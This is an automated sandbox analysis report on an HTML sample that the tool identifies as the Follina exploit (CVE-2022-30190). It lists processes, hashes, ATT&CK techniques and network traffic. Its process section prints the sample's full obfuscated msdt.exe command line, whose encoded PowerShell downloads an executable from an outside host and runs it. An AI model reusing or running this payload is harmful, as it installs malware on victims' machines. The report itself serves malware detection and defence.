Windows
Analysis Report
fbGUvJ4AdV.html
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 4756 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed "about: blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - chrome.exe (PID: 6264 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1964 --fi eld-trial- handle=182 8,i,126023 5374534665 6133,16460 0156025433 45588,1310 72 /prefet ch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - msdt.exe (PID: 1932 cmdline:
"C:\Window s\system32 \msdt.exe" ms-msdt:/ Id%20PcwDi agnOstic%2 0-skIP%20F ORCE%20-pa raM%20%22I t_ReBrOwse foRfILE=#f bK%20IT_La unchMethod =ContextMe nu%20IT_Br owseForFil e=I$(Iex($ (Iex('[SYS tem.teXT.e NCoDiNG]'+ [ChaR]0x3A +[cHaR]58+ 'UTF8.gEtS TRInG([SYS tEm.conVeR T]'+[CHAR] 58+[ChAR]5 8+'fROmbas E64strInG( '+[ChaR]0X 22+'c1RPcC 1QUk9jZXNz IC1GT1JDZS AtTkFtZSAn bXNkdCc7JH NZID0gQWRk LVRZcEUgLW 1FbUJFUmRF RmluaXRpT0 4gJ1tEbGxJ bXBvcnQoIn VSTE1vbi5k TEwiLCBDaG FyU2V0ID0g Q2hhclNldC 5Vbmljb2Rl KV1wdWJsaW Mgc3RhdGlj IGV4dGVybi BJbnRQdHIg VVJMRG93bm xvYWRUb0Zp bGUoSW50UH RyIHUsc3Ry aW5nIEksc3 RyaW5nIGMs dWludCBzUC xJbnRQdHIg Vik7JyAtTm FtZSAibHhQ IiAtTmFtRV NwQWNlIEtJ eCAtUGFzc1 RocnU7ICRz WTo6VVJMRG 93bmxvYWRU b0ZpbGUoMC wiaHR0cHM6 Ly9hLnBvbW YuY2F0L2lw cmlnay5leG UiLCIkZW5W OkFQUERBVE FcQ2JodHIu ZXhlIiwwLD ApO1NUQVJ0 LVNMRWVwKD MpO1J1bkRs bDMyLkVYZS B6aXBmbGRy LmRsbCxSb3 V0ZVRoZUNh bGwgIiRFbn Y6QVBQREFU QVxDYmh0ci 5leGUiO3NU b3AtUFJPQ0 VzcyAtZm9S Q0UgLU5hbW UgJ3NkaWFn bmhvc3Qn'+ [Char]34+' ))'))))Ti/ ../../../. ./../../.. /../../../ .mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 6468 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" "C:\U sers\user\ Desktop\fb GUvJ4AdV.h tml MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Click to jump to signature section
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Directory created: | Jump to behavior |
Source: | IP Address: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | Key opened: |
Source: | Classification label: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | File created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | File opened: |
Source: | Window detected: |
Source: | Directory created: | Jump to behavior |
Source: | Window / User API: |
Source: | Process created: | ||
Source: | Process created: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Application Window Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 4 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
12% | ReversingLabs | Script.Exploit.Heuristic | ||
0% | Metadefender | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.215.237 | true | false | high | |
www.google.com | 172.217.168.36 | true | false | high | |
clients.l.google.com | 172.217.168.78 | true | false | high | |
clients2.google.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
IP |
---|
192.168.2.1 |
192.168.2.23 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696621 |
Start date and time: | 2022-09-02 15:36:44 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | fbGUvJ4AdV.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Without Instrumentation |
Number of analysed new started processes analysed: | 28 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal48.expl.winHTML@41/0@4/7 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
- Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, r1---sn-4g5e6nz7.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5.sn-4g5lznez.gvt1.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
- VT rate limit hit for: fbGUvJ4AdV.html
File type: | |
Entropy (8bit): | 6.049533660136345 |
TrID: | |
File name: | fbGUvJ4AdV.html |
File size: | 19189 |
MD5: | da3469806af3aacbbbd22a763343fff2 |
SHA1: | 6d9fd23a4d32a5963c24d39b5402eeaf2a54f093 |
SHA256: | c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1 |
SHA512: | 7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d |
SSDEEP: | 384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse |
TLSH: | A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A |
File Content Preview: | <!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 15:37:55.447155952 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:55.447221994 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:55.447303057 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:55.448028088 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:55.448054075 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:55.507209063 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:55.620879889 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:55.620906115 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:55.622953892 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:55.623013973 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:55.623038054 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:55.746901989 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:55.923687935 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:55.923748970 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:55.924199104 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:55.924815893 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:55.924838066 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:55.978806973 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:56.047046900 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:56.428919077 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:56.428966999 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:56.430555105 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.430593967 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.430717945 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.431823015 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:56.431899071 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:56.431962967 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:56.432817936 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.432856083 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.432952881 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.433810949 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:56.434012890 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:56.435059071 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.435080051 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.454780102 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.454807997 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.458523989 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:56.458817959 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:56.459108114 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:56.459141970 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:56.490470886 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.505422115 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.513856888 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:56.514025927 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:56.514296055 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:56.535604954 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.535646915 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.536377907 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.536410093 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.536509991 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.536530972 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.536653042 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.536971092 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.536990881 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.537085056 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.537992001 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.538378954 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.538434982 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.538522005 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.547103882 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:56.547138929 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:37:56.558666945 CEST | 49740 | 443 | 192.168.2.7 | 216.58.215.237 |
Sep 2, 2022 15:37:56.558729887 CEST | 443 | 49740 | 216.58.215.237 | 192.168.2.7 |
Sep 2, 2022 15:37:56.570698023 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.571635008 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.641904116 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.642180920 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.644802094 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.644828081 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.646882057 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:37:56.680362940 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.680519104 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.680624962 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.680707932 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.811897039 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:56.811960936 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:37:56.912024975 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:57.325244904 CEST | 49743 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:37:57.325308084 CEST | 443 | 49743 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:38:05.966948986 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:05.967045069 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:05.967128038 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:38:13.007251024 CEST | 49741 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:38:13.007292986 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:41.928656101 CEST | 49745 | 443 | 192.168.2.7 | 172.217.168.78 |
Sep 2, 2022 15:38:41.928677082 CEST | 443 | 49745 | 172.217.168.78 | 192.168.2.7 |
Sep 2, 2022 15:38:55.254595041 CEST | 49800 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:38:55.254668951 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:55.254834890 CEST | 49800 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:38:55.255150080 CEST | 49800 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:38:55.255177975 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:55.308619022 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:55.309545994 CEST | 49800 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:38:55.309570074 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:55.309839010 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:55.310890913 CEST | 49800 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:38:55.310975075 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:38:55.355676889 CEST | 49800 | 443 | 192.168.2.7 | 172.217.168.36 |
Sep 2, 2022 15:39:05.301903963 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Sep 2, 2022 15:39:05.302050114 CEST | 443 | 49800 | 172.217.168.36 | 192.168.2.7 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 15:37:55.181704998 CEST | 60326 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:37:55.201868057 CEST | 53 | 60326 | 8.8.8.8 | 192.168.2.7 |
Sep 2, 2022 15:37:55.369452000 CEST | 50505 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:37:55.387327909 CEST | 53 | 50505 | 8.8.8.8 | 192.168.2.7 |
Sep 2, 2022 15:37:55.436525106 CEST | 61178 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:37:55.463624001 CEST | 53 | 61178 | 8.8.8.8 | 192.168.2.7 |
Sep 2, 2022 15:39:55.318778038 CEST | 59546 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:39:55.336882114 CEST | 53 | 59546 | 8.8.8.8 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 2, 2022 15:37:55.181704998 CEST | 192.168.2.7 | 8.8.8.8 | 0x3245 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 15:37:55.369452000 CEST | 192.168.2.7 | 8.8.8.8 | 0xc5c5 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 15:37:55.436525106 CEST | 192.168.2.7 | 8.8.8.8 | 0x7a44 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 15:39:55.318778038 CEST | 192.168.2.7 | 8.8.8.8 | 0x96a | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 2, 2022 15:37:55.201868057 CEST | 8.8.8.8 | 192.168.2.7 | 0x3245 | No error (0) | 216.58.215.237 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 15:37:55.387327909 CEST | 8.8.8.8 | 192.168.2.7 | 0xc5c5 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 15:37:55.463624001 CEST | 8.8.8.8 | 192.168.2.7 | 0x7a44 | No error (0) | clients.l.google.com | CNAME (Canonical name) | IN (0x0001) | ||
Sep 2, 2022 15:37:55.463624001 CEST | 8.8.8.8 | 192.168.2.7 | 0x7a44 | No error (0) | 172.217.168.78 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 15:39:55.336882114 CEST | 8.8.8.8 | 192.168.2.7 | 0x96a | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.7 | 49740 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:37:56 UTC | 0 | OUT | |
2022-09-02 13:37:56 UTC | 0 | OUT | |
2022-09-02 13:37:56 UTC | 0 | IN | |
2022-09-02 13:37:56 UTC | 2 | IN | |
2022-09-02 13:37:56 UTC | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.7 | 49743 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:37:56 UTC | 2 | OUT | |
2022-09-02 13:37:56 UTC | 2 | IN | |
2022-09-02 13:37:56 UTC | 3 | IN | |
2022-09-02 13:37:56 UTC | 4 | IN | |
2022-09-02 13:37:56 UTC | 4 | IN |
Click to jump to process
Target ID: | 0 |
Start time: | 15:37:44 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c2920000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 15:37:48 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c2920000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 4 |
Start time: | 15:37:51 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c2920000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 21 |
Start time: | 15:39:23 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ed150000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |